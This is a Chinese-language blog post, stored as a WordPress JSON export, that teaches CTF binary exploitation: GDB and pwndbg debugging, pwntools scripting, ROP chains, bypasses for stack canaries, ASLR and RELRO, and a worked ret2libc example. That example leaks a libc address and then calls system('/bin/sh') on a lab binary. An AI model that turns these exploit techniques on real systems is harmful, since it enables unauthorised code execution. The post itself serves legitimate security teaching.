{"id":74192,"date":"2026-02-09T10:25:27","date_gmt":"2026-02-09T02:25:27","guid":{"rendered":"https:\/\/www.wsisp.com\/helps\/74192.html"},"modified":"2026-02-09T10:25:27","modified_gmt":"2026-02-09T02:25:27","slug":"pwn-%e5%ae%9e%e6%88%98%e5%bf%85%e5%a4%87%e5%b7%a5%e5%85%b7%e9%93%be%e4%b8%8e%e9%ab%98%e6%95%88%e8%b0%83%e8%af%95%e6%8a%80%e5%b7%a7","status":"publish","type":"post","link":"https:\/\/www.wsisp.com\/helps\/74192.html","title":{"rendered":"PWN \u5b9e\u6218\u5fc5\u5907\u5de5\u5177\u94fe\u4e0e\u9ad8\u6548\u8c03\u8bd5\u6280\u5de7"},"content":{"rendered":"<h3>1. GDB\u8c03\u8bd5\u6280\u5de7\u4e0e\u63d2\u4ef6\u589e\u5f3a\u5b9e\u6218<\/h3>\n<p>\u4f5c\u4e3aPWN\u5b9e\u6218\u4e2d\u6700\u6838\u5fc3\u7684\u8c03\u8bd5\u5de5\u5177&#xff0c;GDB\u7684\u91cd\u8981\u6027\u600e\u4e48\u5f3a\u8c03\u90fd\u4e0d\u4e3a\u8fc7\u3002\u8bb0\u5f97\u6211\u521a\u5165\u95e8\u65f6&#xff0c;\u9762\u5bf9\u9ed1\u4e4e\u4e4e\u7684\u547d\u4ee4\u884c\u754c\u9762\u4e5f\u662f\u4e00\u5934\u96fe\u6c34&#xff0c;\u4f46\u638c\u63e1\u51e0\u4e2a\u5173\u952e\u6280\u5de7\u540e&#xff0c;\u8c03\u8bd5\u6548\u7387\u76f4\u63a5\u7ffb\u500d\u3002<\/p>\n<p>\u9996\u5148\u5f3a\u70c8\u5efa\u8bae\u914d\u7f6e\u597d.gdbinit\u6587\u4ef6&#xff0c;\u8fd9\u4e2a\u5c0f\u5c0f\u7684\u521d\u59cb\u5316\u6587\u4ef6\u80fd\u6781\u5927\u63d0\u5347\u8c03\u8bd5\u4f53\u9a8c\u3002\u6211\u7684\u914d\u7f6e\u901a\u5e38\u5305\u542b\u8fd9\u4e9b\u5185\u5bb9&#xff1a;<\/p>\n<p>set disassembly-flavor intel<br \/>\nset pagination off<br \/>\nset history save on<\/p>\n<p>Intel\u8bed\u6cd5\u66f4\u7b26\u5408\u5927\u591a\u6570\u4eba\u7684\u9605\u8bfb\u4e60\u60ef&#xff0c;\u5173\u95ed\u5206\u9875\u907f\u514d\u6bcf\u6b21\u663e\u793a\u90fd\u8981\u6309\u56de\u8f66&#xff0c;\u5386\u53f2\u8bb0\u5f55\u4fdd\u5b58\u529f\u80fd\u5219\u65b9\u4fbf\u56de\u987e\u4e4b\u524d\u7684\u8c03\u8bd5\u8fc7\u7a0b\u3002<\/p>\n<p>\u5355\u7eaf\u4f7f\u7528\u539f\u751fGDB\u5c31\u50cf\u7528\u8bb0\u4e8b\u672c\u5199\u4ee3\u7801\u2014\u2014\u80fd\u5e72\u6d3b\u4f46\u6548\u7387\u592a\u4f4e\u3002\u6211\u5f3a\u70c8\u63a8\u8350\u5b89\u88c5pwndbg\u63d2\u4ef6&#xff0c;\u5b83\u63d0\u4f9b\u7684\u53ef\u89c6\u5316\u5806\u5757\u4fe1\u606f\u3001\u5185\u5b58\u6620\u5c04\u663e\u793a\u548c\u667a\u80fd\u641c\u7d22\u529f\u80fd&#xff0c;\u8ba9\u8c03\u8bd5\u8fc7\u7a0b\u66f4\u52a0\u76f4\u89c2\u3002\u5b89\u88c5\u8fc7\u7a0b\u5f88\u7b80\u5355&#xff1a;<\/p>\n<p>git clone https:\/\/github.com\/pwndbg\/pwndbg<br \/>\ncd pwndbg &amp;&amp; .\/setup.sh<\/p>\n<p>\u5b89\u88c5\u5b8c\u6210\u540e&#xff0c;\u4f60\u4f1a\u53d1\u73b0\u81ea\u5df1\u591a\u4e86\u4e00\u53cc&#034;\u900f\u89c6\u773c&#034;\u3002\u6bd4\u5982\u4f7f\u7528heap\u547d\u4ee4\u53ef\u4ee5\u76f4\u63a5\u67e5\u770b\u5806\u5757\u5206\u914d\u60c5\u51b5&#xff0c;vmmap\u80fd\u663e\u793a\u5185\u5b58\u6620\u5c04\u5173\u7cfb&#xff0c;telescope\u53ef\u4ee5\u9012\u5f52\u89e3\u6790\u6307\u9488\u2014\u2014\u8fd9\u4e9b\u529f\u80fd\u5728\u5206\u6790\u5806\u6f0f\u6d1e\u65f6\u7279\u522b\u6709\u7528\u3002<\/p>\n<p>\u5728\u5b9e\u9645\u8c03\u8bd5\u4e2d&#xff0c;\u6211\u4e60\u60ef\u5148\u7528checksec\u67e5\u770b\u7a0b\u5e8f\u4fdd\u62a4\u673a\u5236&#xff0c;\u7136\u540e\u7528GDB\u52a0\u8f7d\u76ee\u6807\u7a0b\u5e8f\u3002\u8bbe\u7f6e\u65ad\u70b9\u65f6&#xff0c;\u9664\u4e86\u51fd\u6570\u540d&#xff0c;\u8fd8\u53ef\u4ee5\u76f4\u63a5\u4f7f\u7528\u5730\u5740\u504f\u79fb&#xff1a;b *$rebase(0x1234)\u3002pwndbg\u7684\u81ea\u52a8\u91cd\u5b9a\u4f4d\u529f\u80fd\u8ba9\u5730\u5740\u8bbe\u7f6e\u66f4\u52a0\u65b9\u4fbf&#xff0c;\u5373\u4f7f\u5f00\u542fPIE\u4e5f\u4e0d\u7528\u624b\u52a8\u8ba1\u7b97\u57fa\u5730\u5740\u3002<\/p>\n<p>\u9047\u5230\u590d\u6742\u7684\u5185\u5b58\u7834\u574f\u6f0f\u6d1e\u65f6&#xff0c;\u6211\u7ecf\u5e38\u4f7f\u7528watchpoint\u6765\u76d1\u63a7\u5185\u5b58\u53d8\u5316\u3002\u6bd4\u5982watch *0x601040\u53ef\u4ee5\u5728\u8be5\u5730\u5740\u88ab\u5199\u5165\u65f6\u6682\u505c\u7a0b\u5e8f&#xff0c;\u8fd9\u5bf9\u4e8e\u5b9a\u4f4d\u6ea2\u51fa\u70b9\u7279\u522b\u6709\u6548\u3002\u914d\u5408context\u547d\u4ee4\u5b9e\u65f6\u663e\u793a\u5bc4\u5b58\u5668\u3001\u5806\u6808\u548c\u53cd\u6c47\u7f16\u4fe1\u606f&#xff0c;\u6574\u4e2a\u8c03\u8bd5\u8fc7\u7a0b\u5c31\u53d8\u5f97\u6e05\u6670\u591a\u4e86\u3002<\/p>\n<h3>2. pwntools\u81ea\u52a8\u5316\u5229\u7528\u5f00\u53d1\u8be6\u89e3<\/h3>\n<p>pwntools\u662f\u6211\u6700\u559c\u6b22\u7684\u6f0f\u6d1e\u5229\u7528\u5f00\u53d1\u6846\u67b6&#xff0c;\u6ca1\u6709\u4e4b\u4e00\u3002\u5b83\u7528Python\u5c01\u88c5\u4e86\u5e95\u5c42\u590d\u6742\u7684\u64cd\u4f5c&#xff0c;\u8ba9\u5f00\u53d1\u8005\u80fd\u591f\u4e13\u6ce8\u4e8e\u5229\u7528\u903b\u8f91\u672c\u8eab\u3002\u521a\u5f00\u59cb\u53ef\u80fd\u89c9\u5f97\u5b66\u4e60\u66f2\u7ebf\u6709\u70b9\u9661&#xff0c;\u4f46\u4e00\u65e6\u638c\u63e1&#xff0c;\u4f60\u4f1a\u53d1\u73b0\u7f16\u5199exploit\u811a\u672c\u53d8\u5f97\u5982\u6b64\u4f18\u96c5\u3002<\/p>\n<p>\u6700\u57fa\u672c\u7684\u811a\u672c\u7ed3\u6784\u662f\u8fd9\u6837\u7684&#xff1a;<\/p>\n<p>from pwn import *<br \/>\ncontext(arch&#061;&#039;amd64&#039;, os&#061;&#039;linux&#039;, log_level&#061;&#039;debug&#039;)<\/p>\n<p>elf &#061; ELF(&#039;.\/vuln_program&#039;)<br \/>\nlibc &#061; ELF(&#039;\/lib\/x86_64-linux-gnu\/libc.so.6&#039;)<\/p>\n<p>if args.REMOTE:<br \/>\n    p &#061; remote(&#039;ctf.example.com&#039;, 9999)<br \/>\nelse:<br \/>\n    p &#061; process(elf.path)<\/p>\n<p>\u8fd9\u91cc\u6709\u4e2a\u5b9e\u7528\u6280\u5de7&#xff1a;\u901a\u8fc7\u547d\u4ee4\u884c\u53c2\u6570\u63a7\u5236\u672c\u5730\u8c03\u8bd5\u8fd8\u662f\u8fdc\u7a0b\u8fde\u63a5\u3002\u8fd0\u884cpython exploit.py REMOTE\u5373\u53ef\u5207\u6362\u5230\u8fdc\u7a0b\u6a21\u5f0f&#xff0c;\u975e\u5e38\u65b9\u4fbf\u3002<\/p>\n<p>\u5728\u6784\u9020payload\u65f6&#xff0c;pwntools\u63d0\u4f9b\u4e86\u4e30\u5bcc\u7684\u5de5\u5177\u51fd\u6570\u3002cyclic(200)\u751f\u6210De Bruijn\u5e8f\u5217\u7528\u4e8e\u5b9a\u4f4d\u504f\u79fb&#xff0c;cyclic_find(0x6161616b)\u53ef\u4ee5\u5feb\u901f\u8ba1\u7b97\u504f\u79fb\u91cf\u3002\u6211\u4e60\u60ef\u5728\u811a\u672c\u5f00\u5934\u5b9a\u4e49\u4e00\u4e9b\u5e38\u7528\u53d8\u91cf&#xff1a;<\/p>\n<p>offset &#061; 72<br \/>\npop_rdi &#061; 0x4011fb<br \/>\nret &#061; 0x40101a<\/p>\n<p>\u5bf9\u4e8e\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e&#xff0c;pwntools\u7684fmtstr_payload\u6a21\u5757\u80fd\u81ea\u52a8\u751f\u6210\u5229\u7528\u5b57\u7b26\u4e32&#xff1a;<\/p>\n<p>payload &#061; fmtstr_payload(offset, {elf.got[&#039;printf&#039;]: elf.sym[&#039;system&#039;]})<\/p>\n<p>\u8fdc\u7a0bexploit\u5f00\u53d1\u6700\u5934\u75bc\u7684\u5c31\u662f\u73af\u5883\u5dee\u5f02\u95ee\u9898\u3002\u6211\u7684\u7ecf\u9a8c\u662f\u4f7f\u7528p &#061; process(&#039;.\/vuln_program&#039;, env&#061;{&#039;LD_PRELOAD&#039;: &#039;.\/libc.target.so&#039;})\u6765\u6307\u5b9alibc\u7248\u672c&#xff0c;\u786e\u4fdd\u672c\u5730\u73af\u5883\u4e0e\u8fdc\u7a0b\u4e00\u81f4\u3002\u53e6\u5916&#xff0c;tube\u7c7b\u7684sendlineafter()\u548crecvuntil()\u65b9\u6cd5\u80fd\u6709\u6548\u5904\u7406\u8f93\u5165\u8f93\u51fa\u540c\u6b65\u95ee\u9898&#xff0c;\u907f\u514drace condition\u3002<\/p>\n<h3>3. ROP\u94fe\u6784\u9020\u5b9e\u6218\u6280\u5de7<\/h3>\n<p>ROP\u662f\u7ed5\u8fc7NX\u4fdd\u62a4\u7684\u5229\u5668&#xff0c;\u4f46\u624b\u5de5\u6784\u9020ROP\u94fe\u786e\u5b9e\u662f\u4e2a\u4f53\u529b\u6d3b\u3002\u7ecf\u8fc7\u591a\u6b21\u5b9e\u6218&#xff0c;\u6211\u603b\u7ed3\u51fa\u4e86\u4e00\u5957\u9ad8\u6548\u7684ROP\u5f00\u53d1\u6d41\u7a0b\u3002<\/p>\n<p>\u9996\u5148\u4f7f\u7528ROPgadget\u6536\u96c6\u53ef\u7528gadget&#xff1a;<\/p>\n<p>ROPgadget &#8211;binary .\/vuln &#8211;ropchain &gt; gadgets.txt<\/p>\n<p>\u4f46\u66f4\u597d\u7684\u65b9\u6cd5\u662f\u4f7f\u7528pwntools\u7684ROP\u6a21\u5757\u52a8\u6001\u6784\u5efa&#xff1a;<\/p>\n<p>from pwn import *<\/p>\n<p>elf &#061; ELF(&#039;.\/vuln&#039;)<br \/>\nrop &#061; ROP(elf)<br \/>\nrop.raw(&#039;A&#039; * offset)<br \/>\nrop.system(next(elf.search(b&#039;\/bin\/sh&#039;)))<br \/>\nprint(rop.dump())<\/p>\n<p>\u5728\u5b9e\u9645\u6f0f\u6d1e\u5229\u7528\u4e2d&#xff0c;\u7ecf\u5e38\u9700\u8981\u6cc4\u9732libc\u5730\u5740\u3002\u5178\u578b\u7684\u505a\u6cd5\u662f\u901a\u8fc7ROP\u8c03\u7528puts\u51fd\u6570\u8f93\u51faGOT\u8868\u9879&#xff1a;<\/p>\n<p>rop.call(&#039;puts&#039;, [elf.got[&#039;puts&#039;]])<br \/>\nrop.call(&#039;vuln_function&#039;)  # \u8fd4\u56de\u4e3b\u51fd\u6570\u7ee7\u7eed\u5229\u7528<\/p>\n<p>\u5bf9\u4e8e32\u4f4d\u7a0b\u5e8f&#xff0c;\u53c2\u6570\u4f20\u9012\u901a\u8fc7\u6808\u8fdb\u884c&#xff0c;\u6784\u9020\u8d77\u6765\u76f8\u5bf9\u7b80\u5355\u3002\u4f4664\u4f4d\u7a0b\u5e8f\u9700\u8981\u6309\u7167\u8c03\u7528\u7ea6\u5b9a\u5728\u5bc4\u5b58\u5668\u4e2d\u653e\u7f6e\u53c2\u6570&#xff0c;\u8fd9\u5c31\u9700\u8981\u66f4\u591a\u7684gadget\u3002\u6211\u5e38\u7528\u7684\u67e5\u627e\u987a\u5e8f\u662f&#xff1a;\u5148\u627epop rdi; ret&#xff0c;\u7136\u540e\u627epop rsi; pop r15; ret&#xff0c;\u6700\u540e\u5904\u7406\u5176\u4ed6\u5bc4\u5b58\u5668\u3002<\/p>\n<p>\u5f53\u9047\u5230\u5730\u5740\u968f\u673a\u5316\u65f6&#xff0c;\u6211\u901a\u5e38\u91c7\u7528partial overwrite\u6280\u5de7\u3002\u56e0\u4e3aPIE\u968f\u673a\u5316\u7684\u5730\u5740\u901a\u5e38\u53ea\u5f71\u54cd\u4f4e12\u4f4d&#xff0c;\u901a\u8fc7\u4fee\u6539\u6700\u540e1-2\u5b57\u8282\u53ef\u4ee5\u7cbe\u786e\u8df3\u8f6c\u5230\u76ee\u6807gadget\u3002\u8fd9\u79cd\u65b9\u6cd5\u5728CTF\u6bd4\u8d5b\u4e2d\u7279\u522b\u5b9e\u7528\u3002<\/p>\n<h3>4. \u4e8c\u8fdb\u5236\u4fdd\u62a4\u673a\u5236\u4e0e\u7ed5\u8fc7\u65b9\u6cd5<\/h3>\n<p>\u73b0\u4ee3\u4e8c\u8fdb\u5236\u7a0b\u5e8f\u90fd\u914d\u5907\u4e86\u5404\u79cd\u4fdd\u62a4\u673a\u5236&#xff0c;\u4e86\u89e3\u8fd9\u4e9b\u673a\u5236\u53ca\u5176\u7ed5\u8fc7\u65b9\u6cd5\u662fPWN\u624b\u7684\u5fc5\u4fee\u8bfe\u3002checksec\u662f\u6211\u4eec\u6700\u597d\u7684\u670b\u53cb&#xff0c;\u5b83\u80fd\u5feb\u901f\u8bc6\u522b\u76ee\u6807\u7a0b\u5e8f\u7684\u4fdd\u62a4\u60c5\u51b5\u3002<\/p>\n<p>Stack Canary\u662f\u6808\u6ea2\u51fa\u7684\u7b2c\u4e00\u9053\u9632\u7ebf&#xff0c;\u4f46\u5e76\u975e\u4e0d\u53ef\u7ed5\u8fc7\u3002\u6211\u5e38\u7528\u7684\u65b9\u6cd5\u5305\u62ec&#xff1a;\u901a\u8fc7\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6cc4\u9732canary\u503c&#xff0c;\u6216\u8005\u8986\u76d6TLS\u7ed3\u6784\u4f53\u4e2d\u7684canary\u5b58\u50a8\u4f4d\u7f6e\u3002\u5bf9\u4e8efork\u670d\u52a1\u5668&#xff0c;\u8fd8\u53ef\u4ee5\u66b4\u529b\u7206\u7834canary\u2014\u2014\u56e0\u4e3afork\u4f1a\u590d\u5236\u5185\u5b58\u7a7a\u95f4&#xff0c;canary\u503c\u4fdd\u6301\u4e0d\u53d8\u3002<\/p>\n<p>ASLR&#xff08;\u5730\u5740\u968f\u673a\u5316&#xff09;\u901a\u8fc7\u968f\u673a\u5316\u5185\u5b58\u5e03\u5c40\u589e\u52a0\u5229\u7528\u96be\u5ea6\u3002\u7ed5\u8fc7ASLR\u7684\u5173\u952e\u662f\u4fe1\u606f\u6cc4\u9732\u3002\u901a\u8fc7\u6808\u6cc4\u9732\u3001\u5806\u6cc4\u9732\u6216\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e&#xff0c;\u53ef\u4ee5\u83b7\u53d6libc\u6216\u4ee3\u7801\u6bb5\u7684\u57fa\u5730\u5740\u3002\u6709\u4e86\u57fa\u5730\u5740&#xff0c;\u6240\u6709\u7b26\u53f7\u7684\u5730\u5740\u5c31\u90fd\u53ef\u4ee5\u8ba1\u7b97\u51fa\u6765\u4e86\u3002<\/p>\n<p>RELRO\u4fdd\u62a4\u5206\u4e3aPartial\u548cFull\u4e24\u79cd\u3002Partial RELRO\u4e0b&#xff0c;\u6211\u4eec\u53ef\u4ee5\u4fee\u6539GOT\u8868\u5b9e\u73b0\u52ab\u6301\u3002\u4f46Full RELRO\u4f1a\u8bbe\u7f6eGOT\u8868\u4e3a\u53ea\u8bfb&#xff0c;\u8fd9\u65f6\u5c31\u9700\u8981\u8f6c\u5411\u5176\u4ed6\u653b\u51fb\u9762&#xff0c;\u5982\u4fee\u6539hook\u51fd\u6570\u6216\u4f7f\u7528return-to-dlresolve\u6280\u672f\u3002<\/p>\n<p>\u5728\u5b9e\u9645\u6f0f\u6d1e\u5229\u7528\u4e2d&#xff0c;\u6211\u4e60\u60ef\u5148\u5c1d\u8bd5\u6700\u7b80\u5355\u76f4\u63a5\u7684\u5229\u7528\u8def\u5f84\u3002\u6bd4\u5982\u5148\u6d4b\u8bd5\u6808\u6ea2\u51fa\u80fd\u5426\u76f4\u63a5\u63a7\u5236EIP&#xff0c;\u518d\u8003\u8651\u7ed5\u8fc7Canary&#xff1b;\u5148\u5c1d\u8bd5ret2libc&#xff0c;\u518d\u8003\u8651\u5b8c\u6574\u7684ROP\u94fe\u3002\u8fd9\u79cd\u6e10\u8fdb\u5f0f\u7684\u601d\u8def\u5f80\u5f80\u80fd\u8282\u7701\u5927\u91cf\u65f6\u95f4\u3002<\/p>\n<h3>5. \u9759\u6001\u5206\u6790\u4e0e\u52a8\u6001\u8c03\u8bd5\u7ed3\u5408<\/h3>\n<p>\u597d\u7684PWN\u624b\u5fc5\u987b\u540c\u65f6\u638c\u63e1\u9759\u6001\u5206\u6790\u548c\u52a8\u6001\u8c03\u8bd5\u6280\u80fd\u3002\u6211\u7684\u5de5\u4f5c\u6d41\u7a0b\u901a\u5e38\u662f&#xff1a;\u5148\u7528IDA Pro\u8fdb\u884c\u9759\u6001\u5206\u6790&#xff0c;\u7406\u89e3\u7a0b\u5e8f\u903b\u8f91\u548c\u6f0f\u6d1e\u70b9&#xff0c;\u7136\u540e\u7528GDB\u52a8\u6001\u9a8c\u8bc1\u5206\u6790\u7ed3\u679c\u3002<\/p>\n<p>\u9759\u6001\u5206\u6790\u9636\u6bb5&#xff0c;\u6211\u91cd\u70b9\u5173\u6ce8\u4ee5\u4e0b\u51e0\u4e2a\u5730\u65b9&#xff1a;\u5371\u9669\u51fd\u6570\u8c03\u7528&#xff08;strcpy\u3001gets\u3001scanf\u7b49&#xff09;\u3001\u5faa\u73af\u8fb9\u754c\u68c0\u67e5\u3001\u5185\u5b58\u5206\u914d\u91ca\u653e\u64cd\u4f5c\u3001\u4ee5\u53ca\u7528\u6237\u8f93\u5165\u5904\u7406\u6d41\u7a0b\u3002IDA\u7684\u4ea4\u53c9\u5f15\u7528\u529f\u80fd&#xff08;Xrefs&#xff09;\u7279\u522b\u6709\u7528&#xff0c;\u53ef\u4ee5\u8ffd\u8e2a\u6570\u636e\u6d41\u5411\u3002<\/p>\n<p>\u53d1\u73b0\u53ef\u7591\u4ee3\u7801\u540e&#xff0c;\u6211\u4f1a\u5728GDB\u4e2d\u8bbe\u7f6e\u65ad\u70b9\u8fdb\u884c\u52a8\u6001\u9a8c\u8bc1\u3002\u6bd4\u5982\u6000\u7591\u67d0\u4e2amalloc\u53c2\u6570\u53ef\u63a7&#xff0c;\u6211\u5c31\u4f1a\u5728malloc\u8c03\u7528\u524d\u65ad\u70b9&#xff0c;\u67e5\u770b\u53c2\u6570\u503c\u662f\u5426\u771f\u7684\u7528\u6237\u53ef\u63a7\u3002\u8fd9\u79cd\u52a8\u9759\u7ed3\u5408\u7684\u65b9\u6cd5\u80fd\u5feb\u901f\u786e\u8ba4\u6f0f\u6d1e\u7684\u53ef\u5229\u7528\u6027\u3002<\/p>\n<p>\u5bf9\u4e8e\u590d\u6742\u7684\u5806\u6f0f\u6d1e&#xff0c;\u6211\u7ecf\u5e38\u4f7f\u7528pwndbg\u7684heap\u547d\u4ee4\u7cfb\u5217\u3002heap bins\u67e5\u770b\u7a7a\u95f2\u5806\u5757&#xff0c;heap chunks\u663e\u793a\u6240\u6709\u5806\u5757&#xff0c;heap arenas\u663e\u793a\u5206\u914d\u533a\u72b6\u6001\u3002\u914d\u5408\u65ad\u70b9\u548cwatchpoint&#xff0c;\u53ef\u4ee5\u6e05\u6670\u89c2\u5bdf\u5806\u5185\u5b58\u7684\u53d8\u5316\u8fc7\u7a0b\u3002<\/p>\n<p>\u5728\u5b9e\u9645\u6bd4\u8d5b\u4e2d&#xff0c;\u65f6\u95f4\u6709\u9650&#xff0c;\u5fc5\u987b\u9ad8\u6548\u5229\u7528\u5de5\u5177\u3002\u6211\u5efa\u8bae\u5148\u5feb\u901f\u8fd0\u884cstrings\u3001ltrace\u3001strace\u7b49\u5de5\u5177\u83b7\u53d6\u57fa\u672c\u4fe1\u606f&#xff0c;\u7136\u540e\u7528IDA\u627e\u5230\u660e\u663e\u6f0f\u6d1e\u70b9\u3002\u4e0d\u8981\u4e00\u5f00\u59cb\u5c31\u9677\u5165\u4ee3\u7801\u7ec6\u8282&#xff0c;\u5927\u5c40\u89c2\u5f80\u5f80\u66f4\u91cd\u8981\u3002<\/p>\n<h3>6. \u5b9e\u6218\u6848\u4f8b&#xff1a;\u6808\u6ea2\u51fa\u6f0f\u6d1e\u5229\u7528<\/h3>\n<p>\u8ba9\u6211\u4eec\u901a\u8fc7\u4e00\u4e2a\u5177\u4f53\u6848\u4f8b\u6765\u6574\u5408\u524d\u9762\u8bb2\u5230\u7684\u5de5\u5177\u548c\u6280\u5de7\u3002\u5047\u8bbe\u6709\u4e00\u4e2a\u5f00\u542fNX\u4fdd\u62a4\u7684\u6808\u6ea2\u51fa\u6f0f\u6d1e\u7a0b\u5e8f&#xff0c;\u6211\u4eec\u9700\u8981\u6784\u9020ROP\u94fe\u5b9e\u73b0\u5229\u7528\u3002<\/p>\n<p>\u9996\u5148\u68c0\u67e5\u4fdd\u62a4\u673a\u5236&#xff1a;<\/p>\n<p>checksec &#8211;file&#061;.\/vuln<\/p>\n<p>\u53d1\u73b0\u5f00\u542f\u4e86NX\u548cASLR&#xff0c;\u4f46\u6ca1\u5f00PIE\u548cCanary\u3002\u8fd9\u610f\u5473\u7740\u6211\u4eec\u9700\u8981\u6cc4\u9732libc\u5730\u5740\u6765\u7ed5\u8fc7ASLR\u3002<\/p>\n<p>\u4f7f\u7528pwntools\u5efa\u7acb\u57fa\u672c\u6846\u67b6&#xff1a;<\/p>\n<p>from pwn import *<br \/>\ncontext.binary &#061; &#039;.\/vuln&#039;<br \/>\ncontext.log_level &#061; &#039;debug&#039;<\/p>\n<p>elf &#061; ELF(&#039;.\/vuln&#039;)<br \/>\nlibc &#061; ELF(&#039;\/lib\/x86_64-linux-gnu\/libc.so.6&#039;)<\/p>\n<p>\u901a\u8fc7\u6ea2\u51fa\u6cc4\u9732puts\u51fd\u6570\u7684\u771f\u5b9e\u5730\u5740&#xff1a;<\/p>\n<p>rop &#061; ROP(elf)<br \/>\nrop.puts(elf.got[&#039;puts&#039;])<br \/>\nrop.call(elf.sym[&#039;main&#039;])  # \u8fd4\u56demain\u51fd\u6570\u91cd\u65b0\u5229\u7528<\/p>\n<p>p.sendlineafter(&#039;Input:&#039;, flat({offset: rop.chain()}))<br \/>\nleak &#061; u64(p.recvline().strip().ljust(8, b&#039;\\\\x00&#039;))<br \/>\nlibc.address &#061; leak &#8211; libc.sym[&#039;puts&#039;]<\/p>\n<p>\u6709\u4e86libc\u57fa\u5730\u5740&#xff0c;\u7b2c\u4e8c\u6b21\u6ea2\u51fa\u5c31\u53ef\u4ee5\u76f4\u63a5\u8c03\u7528system\u4e86&#xff1a;<\/p>\n<p>rop &#061; ROP([elf, libc])<br \/>\nrop.system(next(libc.search(b&#039;\/bin\/sh&#039;)))<br \/>\np.sendlineafter(&#039;Input:&#039;, flat({offset: rop.chain()}))<\/p>\n<p>\u8fd9\u79cd\u4e24\u6b21\u5229\u7528\u7684\u6a21\u5f0f\u5728CTF\u4e2d\u975e\u5e38\u5e38\u89c1&#xff0c;\u5173\u952e\u662f\u786e\u4fdd\u7a0b\u5e8f\u80fd\u591f\u91cd\u65b0\u6267\u884c\u5230\u6f0f\u6d1e\u70b9\u3002\u6709\u4e9b\u7a0b\u5e8f\u8bbe\u8ba1\u4e3a\u53ea\u80fd\u8fd0\u884c\u4e00\u6b21&#xff0c;\u5c31\u9700\u8981\u5bfb\u627e\u5176\u4ed6\u6cc4\u9732\u65b9\u5f0f&#xff0c;\u6bd4\u5982\u901a\u8fc7\u6808\u90e8\u5206\u8986\u76d6\u8fd4\u56de\u5c40\u90e8\u51fd\u6570\u3002<\/p>\n<h3>7. \u9ad8\u6548\u8c03\u8bd5\u4e0e\u95ee\u9898\u6392\u67e5<\/h3>\n<p>\u8c03\u8bd5\u662fPWN\u4e2d\u6700\u8017\u65f6\u7684\u73af\u8282&#xff0c;\u638c\u63e1\u4e00\u4e9b\u9ad8\u6548\u8c03\u8bd5\u6280\u5de7\u80fd\u5927\u5927\u63d0\u5347\u5de5\u4f5c\u6548\u7387\u3002\u6211\u603b\u7ed3\u4e86\u51e0\u6761\u5b9e\u7528\u7ecf\u9a8c&#xff1a;<\/p>\n<p>\u9996\u5148\u5584\u7528GDB\u7684\u811a\u672c\u529f\u80fd\u3002\u53ef\u4ee5\u5c06\u5e38\u7528\u8c03\u8bd5\u547d\u4ee4\u5199\u6210\u811a\u672c&#xff0c;\u6bd4\u5982&#xff1a;<\/p>\n<p>define mycontext<br \/>\n    context<br \/>\n    heap<br \/>\n    telescope $rsp 20<br \/>\nend<\/p>\n<p>\u8fd9\u6837\u6bcf\u6b21\u8f93\u5165mycontext\u5c31\u80fd\u540c\u65f6\u67e5\u770b\u5bc4\u5b58\u5668\u3001\u5806\u6808\u548c\u5806\u72b6\u6001\u3002<\/p>\n<p>\u9047\u5230\u5d29\u6e83\u65f6&#xff0c;\u7b2c\u4e00\u65f6\u95f4\u67e5\u770b\u5d29\u6e83\u73b0\u573a&#xff1a;<\/p>\n<p>x\/10i $rip &#8211; 5  # \u67e5\u770b\u5d29\u6e83\u4f4d\u7f6e\u524d\u540e\u6307\u4ee4<br \/>\ninfo registers  # \u67e5\u770b\u5bc4\u5b58\u5668\u72b6\u6001<br \/>\nx\/20gx $rsp    # \u67e5\u770b\u5806\u6808\u5185\u5bb9<\/p>\n<p>\u5bf9\u4e8e\u5806\u76f8\u5173\u95ee\u9898&#xff0c;\u6211\u4e60\u60ef\u5728\u5173\u952e\u64cd\u4f5c\u524d\u540e\u8bbe\u7f6e\u65ad\u70b9&#xff0c;\u5e76\u8bb0\u5f55\u5806\u72b6\u6001\u3002pwndbg\u7684heap\u547d\u4ee4\u652f\u6301\u5404\u79cd\u8fc7\u6ee4\u6761\u4ef6&#xff0c;\u6bd4\u5982heap bins fast\u53ea\u663e\u793afastbin\u5806\u5757\u3002<\/p>\n<p>\u6709\u65f6\u5019\u6f0f\u6d1e\u5229\u7528\u4e0d\u7a33\u5b9a&#xff0c;\u65f6\u6210\u529f\u65f6\u5931\u8d25\u3002\u8fd9\u901a\u5e38\u662f\u5806\u5e03\u5c40\u6216\u65f6\u5e8f\u95ee\u9898\u5bfc\u81f4\u7684\u3002\u89e3\u51b3\u65b9\u6cd5\u5305\u62ec&#xff1a;\u6dfb\u52a0\u9002\u5f53\u7684padding\u6765\u7a33\u5b9a\u5806\u5e03\u5c40&#xff0c;\u6216\u8005\u4f7f\u7528sleep\u8c03\u6574\u65f6\u5e8f\u3002<\/p>\n<p>\u8fdc\u7a0b\u8c03\u8bd5\u4e5f\u662f\u5fc5\u5907\u6280\u80fd\u3002\u6211\u5e38\u7528socat\u5c06\u672c\u5730\u7a0b\u5e8f\u66b4\u9732\u4e3a\u7f51\u7edc\u670d\u52a1&#xff1a;<\/p>\n<p>socat TCP-LISTEN:9999,reuseaddr,fork EXEC:.\/vuln<\/p>\n<p>\u7136\u540e\u7528GDB\u9644\u52a0\u8c03\u8bd5&#xff1a;<\/p>\n<p>gdb -p $(pidof vuln)<\/p>\n<p>\u6216\u8005\u5728pwntools\u4e2d\u76f4\u63a5\u8c03\u8bd5&#xff1a;<\/p>\n<p>p &#061; gdb.debug(&#039;.\/vuln&#039;, gdbscript&#061;&#039;&#039;&#039;<br \/>\n    b *main&#043;10<br \/>\n    c<br \/>\n&#039;&#039;&#039;)<\/p>\n<p>\u8fd9\u4e9b\u6280\u5de7\u9700\u8981\u5728\u5b9e\u9645\u9879\u76ee\u4e2d\u4e0d\u65ad\u7ec3\u4e60\u624d\u80fd\u719f\u7ec3\u638c\u63e1\u3002\u5efa\u8bae\u4ece\u7b80\u5355\u7684CTF\u9898\u76ee\u5f00\u59cb&#xff0c;\u9010\u6b65\u6311\u6218\u66f4\u590d\u6742\u7684\u6f0f\u6d1e\u7c7b\u578b\u3002\u8bb0\u4f4f&#xff0c;\u5de5\u5177\u53ea\u662f\u8f85\u52a9&#xff0c;\u771f\u6b63\u7684\u529f\u529b\u4f53\u73b0\u5728\u5bf9\u6f0f\u6d1e\u539f\u7406\u7684\u6df1\u523b\u7406\u89e3\u548c\u521b\u9020\u6027\u5229\u7528\u601d\u8def\u4e0a\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"<p>1. 